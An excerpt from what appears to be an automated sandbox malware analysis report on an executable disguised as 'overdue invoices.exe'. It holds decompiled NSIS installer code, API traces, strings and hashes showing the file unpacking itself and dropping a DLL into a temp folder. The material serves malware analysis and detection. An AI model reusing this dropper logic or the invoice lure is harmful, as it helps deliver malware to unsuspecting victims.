                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\overdue invoices.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                  • lstrlenA.KERNEL32(ijmyqjlf,?,?,?,ijmyqjlf,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\overdue invoices.exe" ), ref: 004036BF
                  • lstrcmpiA.KERNEL32(?,.exe,ijmyqjlf,?,?,?,ijmyqjlf,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                  • GetFileAttributesA.KERNEL32(ijmyqjlf), ref: 004036DD
                  • LoadImageA.USER32 ref: 00403726
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  • RegisterClassA.USER32 ref: 0040376D
                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                  • CreateWindowExA.USER32 ref: 004037BE
                  • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                  • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                  • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                  • GetClassInfoA.USER32 ref: 0040381C
                  • GetClassInfoA.USER32 ref: 00403829
                  • RegisterClassA.USER32 ref: 00403832
                  • DialogBoxParamA.USER32 ref: 00403851
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                  • String ID: "C:\Users\user\Desktop\overdue invoices.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ijmyqjlf
                  • API String ID: 914957316-4229931939
                  • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                  • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                  • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402C5B Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 192 402d02 190->192 193 402d04-402d0a call 4031a8 190->193 192->193 196 402d0f-402d11 193->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 203 402d9d-402da1 199->203 204 402d1f-402d37 call 40571d 199->204 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 208 402da3-402da9 call 402bc5 203->208 209 402daa-402db0 203->209 204->209 223 402d39-402d40 204->223 208->209 215 402db2-402dc0 call 405e0f 209->215 216 402dc3-402dcd 209->216 215->216 216->189 216->190 220->197 225 402e0a-402e10 220->225 223->209 227 402d42-402d49 223->227 225->197 225->201 227->209 230 402d4b-402d52 227->230 228->182 237 402ead-402eb0 229->237 230->209 232 402d54-402d5b 230->232 232->209 234 402d5d-402d7d 232->234 234->197 236 402d83-402d87 234->236 239 402d89-402d8d 236->239 240 402d8f-402d97 236->240 237->197 238 402eb9-402eca 237->238 241 402ed2-402ed7 238->241 242 402ecc 238->242 239->189 239->240 240->209 243 402d99-402d9b 240->243 244 402ed8-402ede 241->244 242->241 243->209 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                  C-Code - Quality: 96%
                  			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				signed int _t63;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\overdue invoices.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\engineer\\Desktop\\overdue invoices.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\overdue invoices.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\engineer\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4; // 0x7e00
					if(__eflags == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t63 =  *0x423eb4; // 0x7e00
							_t65 = E004031DA(_t63 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x41c20
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t79 =  *0x423eb4; // 0x7e00
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4; // 0x7e00
						if(__eflags != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x0
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x2f9
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

































                  0x00402c69
                  0x00402c6c
                  0x00402c86
                  0x00402c8b
                  0x00402c9e
                  0x00402ca3
                  0x00402ca9
                  0x00000000
                  0x00402cab
                  0x00402cbc
                  0x00402ccd
                  0x00402cd4
                  0x00402cda
                  0x00402cdc
                  0x00402ce1
                  0x00402ce3
                  0x00402dd3
                  0x00402dd5
                  0x00402dda
                  0x00402de1
                  0x00000000
                  0x00000000
                  0x00402de7
                  0x00402dea
                  0x00402e16
                  0x00402e1b
                  0x00402e26
                  0x00402e28
                  0x00402e39
                  0x00402e54
                  0x00402e5a
                  0x00402e5d
                  0x00402e62
                  0x00402e78
                  0x00402e81
                  0x00402e91
                  0x00402ea3
                  0x00402ea8
                  0x00402ead
                  0x00402eb0
                  0x00402eb9
                  0x00402ebd
                  0x00402ec5
                  0x00402eca
                  0x00402ecc
                  0x00402ecc
                  0x00402ecc
                  0x00402ed4
                  0x00402ed4
                  0x00402ed7
                  0x00402ed8
                  0x00402ed8
                  0x00402edb
                  0x00402edd
                  0x00402edd
                  0x00402edd
                  0x00402ee0
                  0x00402ee7
                  0x00402ef3
                  0x00402ef8
                  0x00000000
                  0x00402ef8
                  0x00000000
                  0x00402eb0
                  0x00000000
                  0x00402e64
                  0x00402df2
                  0x00402dfd
                  0x00402e02
                  0x00402e04
                  0x00000000
                  0x00000000
                  0x00402e0d
                  0x00402e10
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402ce9
                  0x00402ce9
                  0x00402ce9
                  0x00402cee
                  0x00402cf2
                  0x00402cf9
                  0x00402cfe
                  0x00402d00
                  0x00402d02
                  0x00402d02
                  0x00402d0a
                  0x00402d0f
                  0x00402d11
                  0x00402e70
                  0x00402eb2
                  0x00000000
                  0x00402eb2
                  0x00402d17
                  0x00402d1d
                  0x00402d9d
                  0x00402da1
                  0x00402da4
                  0x00402da9
                  0x00000000
                  0x00402da1
                  0x00402d2a
                  0x00402d2f
                  0x00402d32
                  0x00402d37
                  0x00000000
                  0x00000000
                  0x00402d39
                  0x00402d40
                  0x00000000
                  0x00000000
                  0x00402d42
                  0x00402d49
                  0x00000000
                  0x00000000
                  0x00402d4b
                  0x00402d52
                  0x00000000
                  0x00000000
                  0x00402d54
                  0x00402d5b
                  0x00000000
                  0x00000000
                  0x00402d5d
                  0x00402d63
                  0x00402d6c
                  0x00402d72
                  0x00402d75
                  0x00402d77
                  0x00402d7d
                  0x00000000
                  0x00000000
                  0x00402d83
                  0x00402d87
                  0x00402d8f
                  0x00402d8f
                  0x00402d92
                  0x00402d95
                  0x00402d97
                  0x00402d99
                  0x00402d99
                  0x00000000
                  0x00402d97
                  0x00402d89
                  0x00402d8d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402daa
                  0x00402daa
                  0x00402db0
                  0x00402dc0
                  0x00402dc0
                  0x00402dc3
                  0x00402dc9
                  0x00402dcb
                  0x00402dcb
                  0x00000000
                  0x00402ce9

                  APIs
                  • GetTickCount.KERNEL32 ref: 00402C6F
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\overdue invoices.exe,00000400), ref: 00402C8B
                    • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\overdue invoices.exe,80000000,00000003), ref: 00405760
                    • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\overdue invoices.exe,C:\Users\user\Desktop\overdue invoices.exe,80000000,00000003), ref: 00402CD4
                  • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                  Strings
                  • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                  • Null, xrefs: 00402D54
                  • "C:\Users\user\Desktop\overdue invoices.exe" , xrefs: 00402C68
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                  • Error launching installer, xrefs: 00402CAB
                  • C:\Users\user\Desktop\overdue invoices.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                  • soft, xrefs: 00402D4B
                  • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                  • Inst, xrefs: 00402D42
                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                  • String ID: "C:\Users\user\Desktop\overdue invoices.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\overdue invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                  • API String ID: 2803837635-2733243555
                  • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                  • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                  • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401734 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 342->335 343->342 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 358 401884-401888 346->358 359 40188a-401896 SetFileTime 346->359 347->333 380 401830-401831 347->380 360 40184e-401854 348->360 358->359 362 40189c-4018a7 FindCloseChangeNotification 358->362 359->362 363 402886 360->363 366 40287d-402880 362->366 367 4018ad-4018b0 362->367 365 402888-40288c 363->365 366->363 370 4018b2-4018c3 call 405aa7 lstrcatA 367->370 371 4018c5-4018c8 call 405aa7 367->371 377 4018cd-402205 call 405346 370->377 371->377 377->365 384 40264e-402655 377->384 380->360 382 401833-401834 380->382 382->348 384->366
                  C-Code - Quality: 75%
                  			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\engineer\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\engineer\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                  0x00401734
                  0x0040173b
                  0x00401744
                  0x00401747
                  0x0040174a
                  0x0040174f
                  0x00401757
                  0x00401773
                  0x00401759
                  0x00401759
                  0x0040175a
                  0x0040175a
                  0x00401779
                  0x00401783
                  0x00401783
                  0x00401787
                  0x0040178a
                  0x0040178f
                  0x00401791
                  0x00401793
                  0x00401798
                  0x00401798
                  0x004017a3
                  0x004017a3
                  0x004017b4
                  0x004017b6
                  0x004017b6
                  0x004017b7
                  0x004017b7
                  0x004017ba
                  0x004017bd
                  0x004017c0
                  0x004017c0
                  0x004017c7
                  0x004017d6
                  0x004017db
                  0x004017de
                  0x004017e1
                  0x00000000
                  0x00000000
                  0x004017e3
                  0x004017e6
                  0x00401840
                  0x00401845
                  0x004015a8
                  0x0040264e
                  0x0040264e
                  0x0040287d
                  0x00402880
                  0x00402880
                  0x00000000
                  0x004017e8
                  0x004017ee
                  0x004017f9
                  0x00401806
                  0x00401811
                  0x00401827
                  0x00401827
                  0x0040182a
                  0x00000000
                  0x00401830
                  0x00401830
                  0x00401831
                  0x0040184e
                  0x00402886
                  0x00402886
                  0x00402886
                  0x00401833
                  0x00401833
                  0x00401834
                  0x00401492
                  0x00402200
                  0x00402200
                  0x00402200
                  0x00401831
                  0x0040182a
                  0x00402888
                  0x0040288c
                  0x0040288c
                  0x0040185e
                  0x00401863
                  0x00401871
                  0x00401876
                  0x0040187c
                  0x00401880
                  0x00401882
                  0x0040188a
                  0x00401896
                  0x00401884
                  0x00401884
                  0x00401888
                  0x00000000
                  0x00000000
                  0x00401888
                  0x0040189f
                  0x004018a5
                  0x004018a7
                  0x00000000
                  0x004018ad
                  0x004018ad
                  0x004018b0
                  0x004018c8
                  0x004018b2
                  0x004018b5
                  0x004018be
                  0x004018be
                  0x004018cd
                  0x004018d2
                  0x004021fb
                  0x00000000
                  0x004021fb
                  0x00000000

                  APIs
                  • lstrcatA.KERNEL32(00000000,00000000,ijmyqjlf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                  • CompareFileTime.KERNEL32(-00000014,?,ijmyqjlf,ijmyqjlf,00000000,00000000,ijmyqjlf,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,vmklrdjtbsiifoh Setup,NSIS Error), ref: 00405A92
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsz4671.tmp$C:\Users\user\AppData\Local\Temp\nsz4671.tmp\urfzxvl.dll$ijmyqjlf
                  • API String ID: 1941528284-2725762695
                  • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                  • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                  • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 394 403024 392->394 393->392 395 402f68-402f7b call 40302c 393->395 394->390 395->390 398 402f81-402f84 395->398 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 403 402ff9 399->403 404 402ffc-40300f ReadFile 399->404 401 40301d-403020 400->401 402 402f8f 400->402 401->390 405 402f94-402f9c 402->405 403->404 404->392 406 403011-40301a 404->406 407 402fa1-402fb3 ReadFile 405->407 408 402f9e 405->408 406->401 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->394 413->405 414 402feb 413->414 414->401
                  C-Code - Quality: 93%
                  			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x613a
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
